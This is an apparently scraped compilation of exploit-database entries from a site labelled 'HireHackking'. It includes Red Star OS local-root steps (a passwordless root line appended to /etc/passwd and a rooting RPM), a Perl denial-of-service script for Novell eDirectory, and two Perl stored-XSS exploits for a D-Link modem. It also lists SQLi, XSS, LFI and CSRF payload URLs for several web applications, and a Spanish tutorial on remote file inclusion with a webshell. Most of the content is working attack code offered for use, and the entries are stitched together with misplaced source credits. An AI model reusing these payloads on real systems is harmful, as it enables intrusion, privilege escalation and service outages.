mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
rm /tmp/r00t.sh
EOF
chmod +x /tmp/r00t.sh
echo "sudo will be available after reboot"
sleep 2
reboot

## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6
HireHackking 
Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit"
which can be abused to execute commands on
boot. An example exploitation of this vulnerability is shown here
https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png

PoC:

/bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd
su - root


## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6
HireHackking 
The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. 
UnFortunately, they left a big security hole: the Software Manager (swmng.app), 
which runs as root through sudo and will install any RPM package, even if unsigned.

To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key,
double-click it to open it with the Software Manager, and click through the blue buttons until it’s done.
After that, run rootsh to get a root shell. 
Being a RedHat-based system (hinting on Fedora 15), SELinux will prevent you from doing some things, 
but disabling it is a matter of running setenforce 0 as root.


Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35749.rpm (redstarroot.rpm)


## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1
HireHackking 
source: https://www.securityfocus.com/bid/47857/info

The 'com_docman' component for Mambo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

'com_docman' 1.3 is vulnerable. 

http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=-11[SQLi]
http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=15&limitstart=-11[SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/47858/info

Novell eDirectory and Netware are prone to a denial-of-service vulnerability.

Remote attackers can exploit this issue to cause a system-wide denial-of-service. 

#!/usr/bin/perl
      # usage: ./novell.pl 10.0.0.1 0x41424344
      use IO::Socket::SSL;
      $socket = new IO::Socket::SSL(Proto=>"tcp",
      PeerAddr=>$ARGV[0], PeerPort=>636);
      die "unable to connect to $host:$port ($!)\n" unless $socket;
      print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
      "\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
      close $socket; print "done\n";
HireHackking 
# Exploit Title: D-Link DSL-2730B Modem lancfg2get.cgi Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
 

#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#


use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

                my $ip = $ARGV[0];
                my $user = $ARGV[1];
                my $pass = $ARGV[2];
                             
                $ip = $1 if($ip=~/(.*)\/$/);

                               if (@ARGV != 3){

                                               print "\n";
                                               print "XLabs Information Security www.xlabs.com.br\n";
                                               print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
                                               print "Developed by Mauricio Correa\n";
                                               print "Contact: mauricio\@xlabs.com.br\n";
                                               print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
                               }else{
                                               print "XLabs Information Security www.xlabs.com.br\n";
                                               print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
                                               print "Developed by Mauricio Correa\n";
                                               print "Contact: mauricio\@xlabs.com.br\n";
                                               print "[+] Exploring $ip\/ ...\n";
 
                                               my $payload = "%27;alert(%27XLabsSec%27);\/\/";
                                           
                                               my $ua = new LWP::UserAgent;
                                               my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

                                               $hdrs->authorization_basic($user, $pass);
                                             
                                               chomp($ip);
                                             
                                               print "[+] Preparing exploit...\n";
                                            
                                               my $url_and_xpl = "$ip/lancfg2get.cgi?brName=$payload";
                                                                                           
                                               my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

                                               print "[+] Prepared!\n";
                                            
                                               print "[+] Requesting and Exploiting...\n";
                                             
                                               my $resp = $ua->request($req);

                                               if ($resp->is_success){

                                               print "[+] Successfully Requested!\n";
                                           
                                             
                                                               my $url = "$ip/lancfg2.html";
                                            
                                                               $req = new HTTP::Request("GET",$url,$hdrs);

                                                               print "[+] Checking that was explored...\n";
                                                           
                                                            
                                                               my $resp2 = $ua->request($req);
                                                        
                                                            
                                                               if ($resp2->is_success){

                                                               my $resultado = $resp2->as_string;
                                                           
                                                                                                             if(index($resultado, uri_unescape($payload)) != -1){
                                                                                                            
                                                                                                              print "[+] Successfully Exploited!";

                                                                                                              }else{
                                                                                                            
                                                                                                              print "[-] Not Exploited!";
                                                                                                           
                                                                                                              }
                                                               }
 
                                               }else {

                                               print "[-] Ops!\n";
                                               print $resp->message;
                                               }

}
HireHackking 
# Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux


#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit enable some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
 

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;


                my $ip = $ARGV[0];
                my $user = $ARGV[1];
                my $pass = $ARGV[2];
                          
                $ip = $1 if($ip=~/(.*)\/$/);

                               if (@ARGV != 3){
                                               print "\n";
                                               print "XLabs Information Security www.xlabs.com.br\n";
                                               print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
                                               print "Developed by Mauricio Correa\n";
                                               print "Contact: mauricio\@xlabs.com.br\n";
                                               print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

                               }else{

                                               print "XLabs Information Security www.xlabs.com.br\n";
                                               print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
                                               print "Developed by Mauricio Correa\n";
                                               print "Contact: mauricio\@xlabs.com.br\n";
                                               print "[+] Exploring $ip\/ ...\n";

                                               my $payload = "%27;alert(%27XLabsSec%27);\/\/";
                                      
                                               my $ua = new LWP::UserAgent;

                                               my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );


                                               $hdrs->authorization_basic($user, $pass);
                                            
                                               chomp($ip);
                                             

                                               print "[+] Preparing...\n";
                                             

                                               my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A";
                                         
                                             
                                               my $req = new HTTP::Request("GET",$url,$hdrs);

                                               print "[+] Prepared!\n";
                                            
                                               print "[+] Requesting...\n";
                                            
                                               my $resp = $ua->request($req);

                                               if ($resp->is_success){

                                               print "[+] Successfully Requested!\n";

                                               my $resposta = $resp->as_string;

                                               print "[+] Obtain session key...\n";
                                             
                                               my $token = "";
                                             
                                               if($resposta =~ /sessionKey=(.*)\';/){
                                                               $token = $1;                                     
                                                               print "[+] Session key found: $token\n";
                                               }else{
                                                               print "[-] Session key not found!\n";
                                                               exit;
                                               }

                                            
                                                               print "[+] Preparing exploit...\n";
                                             
                                                               my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";
                                            
                                                               $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

                                                               print "[+] Prepared!\n";
                                                            
                                                               print "[+] Exploiting...\n";
                                                             
                                                               my $resp2 = $ua->request($req);
                                                             
                                                            
                                                               if ($resp2->is_success){

                                                               my $resultado = $resp2->as_string;
                                                             
                                                                                                              if(index($resultado, uri_unescape($payload)) != -1){
                                                                                                            
                                                                                                              print "[+] Successfully Exploited!";
 
                                                                                                              }else{
                                                                                                            
                                                                                                              print "[-] Not Exploited!";
                                                                                                            
                                                                                                              }
                                                               }

                                               }else {

                                               print "[-] Ops!\n";
                                               print $resp->message;
                                               }
}
HireHackking 
source: https://www.securityfocus.com/bid/47860/info

allocPSA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

allocPSA 1.7.4 is vulnerable; other versions may also be affected. 

http://www.example.com/allocPSA-1.7.4/login/login.php?sessID=%3Cscript%3Ealert%280%29%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/47861/info

DocMGR is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

DocMGR 1.1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/docmgr/history.php?f=0%22%29;}alert%280%29;{//
HireHackking 
source: https://www.securityfocus.com/bid/47865/info

openQRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

openQRM 4.8 is vulnerable; other versions may also be affected. 

http://www.example.com/openqrm-4.8/src/plugins/zfs-storage/web/zfs-storage-action.php?source_tab="<script>alert(0)</script>
HireHackking 
source: https://www.securityfocus.com/bid/47870/info

eFront is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. 

http://www.example.com/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
HireHackking 
source: https://www.securityfocus.com/bid/47874/info

Mitel Audio and Web Conferencing is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Audio and Web Conferencing 4.4.3.0 is vulnerable; other versions may also be affected.

https://www.example.com/wd/wdinvite.asp?SID=&#039;><script>alert(1)</script>

https://www.example.com/wd/connect.asp?mode=joinmeeting&uid=&#039;><script>alert(1)</script>&sid=&#039;><script>alert(1)</script>

https://www.example.com/wd/applets/Error.asp?type=</span><script>alert(1)</script>
HireHackking 
source: https://www.securityfocus.com/bid/47877/info

eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. 

http://www.example.com/efront/www/modules/module_crossword/app/submitScore.php?seq=<script>alert(0)</script>&cookie=<script>alert(0)</script>
HireHackking 
source: https://www.securityfocus.com/bid/47887/info

PHP Calendar Basic is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

PHP Calendar Basic 2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?month=5"><script>alert(&#039;XSS&#039;)</script>&year=2011"><sc ript>alert(document.cookie)</script>

<form action="http://www.example.com/event_add.php?day=27&month=4&year=2011" method="post" name="main">
<input type="hidden" name="month" value="4">
<input type="hidden" name="day" value="27">
<input type="hidden" name="year" value="2011">
<input type="hidden" name="hour" value="20">
<input type="hidden" name="minute" value="00">
<input type="hidden" name="title" value="1<script>alert(&#039;XSS&#039;)</script>">
<input type="hidden" name="description" value="descr">
<input type="submit" id="btn" name="submit" value="Add Event">
</form>
<script>
document.getElementById(&#039;btn&#039;).click();
</script>


http://www.example.com/event_delete.php?day=28&month=4&year=2011&id=1"><script>alert(document.c ookie)</script>
HireHackking 
source: https://www.securityfocus.com/bid/47901/info

Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.

This issue is being tracked by Cisco Bug ID CSCtn61716.

Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
HireHackking 
source: https://www.securityfocus.com/bid/47901/info
 
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
 
This issue is being tracked by Cisco Bug ID CSCtn61716.
 
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceC
apability=deviceCap
http://www.example.com/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c
06d&deviceCapability=deviceCap
HireHackking 
source: https://www.securityfocus.com/bid/47899/info

TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions prior to TWiki 5.0.2 are vulnerable. 


GET /twiki/bin/login/Sandbox/WebHome?%27%221=;origurl=1%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x00039C%29%3C/script%3E

GET /twiki/bin/login/Sandbox/WebHome?sudo=sudo;origurl=http://10.1.10.128/bin/view/Main/TWikiAdminUser%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x00044C%29%3C%2Fscript%3E
HireHackking

Remote File Inclusion (RFI)

El Remote File Inclusion (RFI) es una vulnerabilidad muy parecida al LFI (Local File Inclusion). La diferencia es que mientras el LFI te permite la inclusión de archivos locales, el RFI te permite incluir archivos remotos.

Claro esto es super turbio, porque si nosotros como atacante nos montamos un servidor web. Podemos aprovechar el RFI de la máquina víctima para que cargue e interprete como si fuera suyo un archivo malicioso que estemos alojando.

Vamos a montarnos la vulnerabilidad en local:

Primero de todo, creamos el archivo PHP que alojará la inclusión de archivos:

image 133

Este es un código sencillo donde a partir de una petición GET, el servidor recibirá un valor por el parámetro «file» e incluirá el archivo con ese nombre en la página.

Con este código, si accedemos a la URL:

  • http://localhost/index.php?file=/etc/hosts

Nos cargará el archivo hosts. Sin embargo, tenemos que habilitar que admita también URLs. Para ello, nos dirigimos a la configuración de PHP, la podemos encontrar con:

image 134

Como en mi caso el servidor web lo voy a montar usando el propio comando PHP, editaré el archivo de configuración de la segunda línea.

Dentro de este archivo, tenemos que buscar la variable allow_url_include:

image 124

Por defecto, el valor de esta variable será Off, por lo que nosotros simplemente la cambiamos a On y listo.

Con esto hecho, ya simplemente nos montamos el servidor web con el comando php:

  • php -S localhost:80
image 135
image 126

Podemos comprobar que el archivo y el servidor web funcionan correctamente, ya que el LFI funciona, esto ocurre porque el LFI y el RFI comparten el mismo código PHP, por lo que al comprobar que el LFI funciona sabemos que todo está correctamente.

Ahora bien, en otro equipo, voy a alojar el archivo malicioso (una webshell) y voy a montar un servidor web:

image 127

Ahora mismo este equipo que es un Debian con IP 192.168.118.131 está compartiendo el archivo sikushell.php.

Por lo que si yo ahora desde el servidor web vulnerable, cambio el /etc/hosts por la dirección del servidor web del Debian, debería de recibir una petición GET:

image 128
image 129

Efectivamente, por el lado del servidor recibo la petición GET, y por el lado del cliente puedo visualizar todo lo este está compartiendo. Ahora, además de especificar el servidor web, vamos a dirigirnos al archivo sikushell.php:

image 130

Parece que existe, pero no nos muestra nada, esto es porque está esperando el parámetro cmd, que es el que hemos indicado en el archivo malicioso:

image 131

Nótese como al concatenar el nuevo parámetro cmd a todo los demás, hemos usado un ampersand (&). Esto es porque la interrogación que corresponde siempre al primer parámetro, ya está siendo usada por el parámetro file.

Parece que se nos interpreta correctamente el archivo malicioso y estamos ejecutando comandos. Si vemos en que máquina estamos, podemos ver que estamos en el kali, dicho de otra forma, el servidor web vulnerable:

image 132

Estamos ejecutando comandos localmente usando un archivo remoto. Esto es básicamente un Remote File Inclusion.

HireHackking 
source: https://www.securityfocus.com/bid/47901/info
   
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
   
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
   
This issue is being tracked by Cisco Bug ID CSCtn61716.
   
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3b
alert(1)//608ddbf972
http://www.example.com/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3ba
lert(1)//79877affe89
HireHackking 
source: https://www.securityfocus.com/bid/47901/info
  
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
  
This issue is being tracked by Cisco Bug ID CSCtn61716.
  
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870
d5&viewname=device.filter&operation=getFilter&dojo.preventCache=129851
8961028
http://www.example.com/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>
09520eb762c&dojo.preventCache=1298518963370